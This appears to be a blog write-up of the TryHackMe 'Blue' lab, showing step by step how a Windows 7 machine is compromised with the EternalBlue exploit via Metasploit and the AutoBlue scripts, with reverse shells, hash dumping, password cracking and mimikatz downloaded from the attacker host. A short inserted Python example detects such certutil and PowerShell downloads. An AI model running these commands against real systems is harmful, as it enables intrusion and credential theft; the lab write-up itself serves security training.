TryHackMe : Blue

ratiros01
8 min read · Mar 17, 2020

[Task 1] Recon

  1. Scan the machine.
nmap -Pn <ip>
nmap -A -T 5 <ip> -vv

It’s a Windows 7 machine.

2. How many ports are open with a port number under 1000?
ANS: See the scan output in #1.

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

nmap --script vuln <ip> -vv

[Task 2] Gain Access

  1. Start Metasploit
msfconsole

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

search ms17-010

Because the machine is Windows 7, let’s try “windows/smb/ms17_010_eternalblue”

use 2

3. Show options and set the one required value. What is the name of this value? (All caps for submission)

show options
set RHOSTS <target ip>

4. Run the exploit!

run

Success!!!

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

Press enter

[Task 3] Escalate

  1. If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Back to metasploit first

background

Verify sessions

sessions
use multi/manage/shell_to_meterpreter

2. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)
ANS: It’s in #1.

3. Set the required option, you may need to list all of the sessions to find your target here.

set LPORT 1234
set SESSION 1

4. Run! If this doesn’t work, try completing the exploit from the previous task once more.

run

5. Once the meterpreter shell conversion completes, select that session for use.

Verify sessions

sessions
sessions 2

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

getsystem
shell
whoami

Press “ctrl+z” to go back to meterpreter

7. List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

ps

8. Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.

Migrate to lsass.exe

migrate 708

[Task 4] Cracking

Dump the non-default user’s password and crack it!

  1. Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
hashdump

2. Copy this password hash to a file and research how to crack it. What is the cracked password?
Copy it to a file; it’s an NTLM hash.

Organize the hash for cracking

I will use hashcat for cracking.
Reference: https://github.com/frizb/Hashcat-Cheatsheet

hashcat -a 0 -m 1000 hashforcrack.txt rockyou.txt --force --username --show

Explanation:

“-a 0” means attack mode 0 (straight dictionary attack)
“-m 1000” means NTLM hash
“--force” is needed because my machine does not have a native Intel OpenCL runtime
“--username” means the hash file contains usernames, which hashcat should ignore
“--show” means show the cracked password

[Task 5] Find flags!
1. Flag1? (Only submit the flag contents {CONTENTS})
Flag1 is located in C:\

cat flag1.txt

2. Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This is relatively rare; however, it can happen.
Flag2 is located in “C:\Windows\System32\config”.

cat flag2.txt

3. flag3?
Flag3 is located in “C:\Users\Jon\Documents”.

cat flag3.txt

[Final] Let’s try without metasploit

1. Shell

I use this script from https://github.com/3ndG4me/AutoBlue-MS17-010

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010

Check if target is vulnerable

python eternal_checker.py <target ip>

Create shellcode

cd shellcode
./shell_prep.sh

Answer the questions in shell_prep.sh

1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 4444
4. LPORT x86 : 5555
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 0

Start listener

nc -lvp 4444
nc -lvp 5555

Let’s exploit. From /shellcode, go back up to /AutoBlue-MS17-010 (the parent directory)

cd ..
ls

I will use eternalblue_exploit7.py

python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin

Failed: no shell on my listener.

Let’s run the command again; it still fails.

python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin

Let’s create new shellcode; remove the old one first

cd shellcode
rm sc*
ls

Create shellcode

./shell_prep.sh

Answer the questions in shell_prep.sh; this time I will use different ports and a stageless payload

1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 8888
4. LPORT x86 : 9999
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1

Start listener

nc -lvp 8888
nc -lvp 9999

Let’s run the command again. This time I had to run the command twice before I got a shell.

python eternalblue_exploit7.py <target ip> shellcode/sc_all.bin

At the listener, I have a shell on port 8888.

Conclusion:
I think the EternalBlue exploit is somewhat unstable. Sometimes I have to run the script 5 times before I get a reverse shell.

Just don’t give up; keep trying.

2. Find flag

cd \
dir flag* /s /b

3. Dump password

Download mimikatz: https://sourceforge.net/projects/mimikatz.mirror/

In the folder containing mimikatz.exe, start an HTTP server

python -m SimpleHTTPServer 1234

In the Windows shell, download mimikatz.exe

powershell -c "Invoke-WebRequest -OutFile mimikatz.exe http://<attacker ip>:<attacker port>/mimikatz.exe"

Powershell failed!!!

No file is downloaded.

Stop the shell and run the exploit again; this time I will use certutil

certutil.exe -urlcache -f http://<attacker ip>:<attacker port>/mimikatz.exe mimikatz.exe

Success!!!
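Both download attempts above (PowerShell Invoke-WebRequest and certutil -urlcache -f) are built-in Windows tools being used to pull a file onto the host, and each one leaves its full command line in the process-creation event (Windows Security event 4688 or Sysmon event 1). That command line is the cheapest place for a defender to catch this step. The following is an added example, not part of the original walkthrough: a small rule set run over constructed process-creation events. The host name, user names, IP address and every event below are constructed for the example, not real logs.

```python
"""Flag living-off-the-land downloads in process-creation events.
Added example with constructed sample events (hostname, users, IP and
command lines are all made up for the demonstration)."""
import re

# Constructed sample events in a 4688/Sysmon-like shape. Not real logs.
SAMPLE_EVENTS = [
    {"host": "WIN7-BLUE", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c dir flag* /s /b"},
    {"host": "WIN7-BLUE", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest -OutFile mimikatz.exe '
                'http://10.0.0.5:1234/mimikatz.exe"'},
    {"host": "WIN7-BLUE", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://10.0.0.5:1234/mimikatz.exe mimikatz.exe"},
    {"host": "WIN7-BLUE", "user": "WIN7-BLUE\\Jon",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil -verify C:\\certs\\server.cer"},   # benign certutil use
]

# Each rule: name, regex over the command line. Kept narrow on purpose:
# certutil is only flagged when -urlcache is combined with a URL, so the
# benign certificate-verification call above does not fire.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    ("powershell_web_download",
     re.compile(r"powershell.*(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString)", re.I)),
]

SYSTEM_USER = "NT AUTHORITY\\SYSTEM"


def classify_event(event):
    """Return the names of all rules whose pattern matches the command line."""
    return [name for name, rx in RULES if rx.search(event["cmdline"])]


def severity(event):
    """A download run as SYSTEM is treated as high severity: a legitimate
    administrator fetching a file normally does so from their own account."""
    return "high" if event["user"] == SYSTEM_USER else "medium"


def scan_events(events):
    """Run every rule over every event and return one finding per match."""
    findings = []
    for ev in events:
        for rule in classify_event(ev):
            findings.append({"rule": rule, "severity": severity(ev),
                             "host": ev["host"], "user": ev["user"],
                             "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']} on {f['host']} as {f['user']}: {f['cmdline']}")
```

Run against the constructed events, the cmd.exe directory listing and the certificate-verification call produce nothing, while the two download commands each produce one high-severity finding because they execute as SYSTEM. In a real pipeline the same rules would be applied to the CommandLine field of the collected events.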

dir

Run mimikatz.exe

mimikatz.exe
lsadump::sam

Crack the hash with CrackStation

Let’s RDP: open Remmina
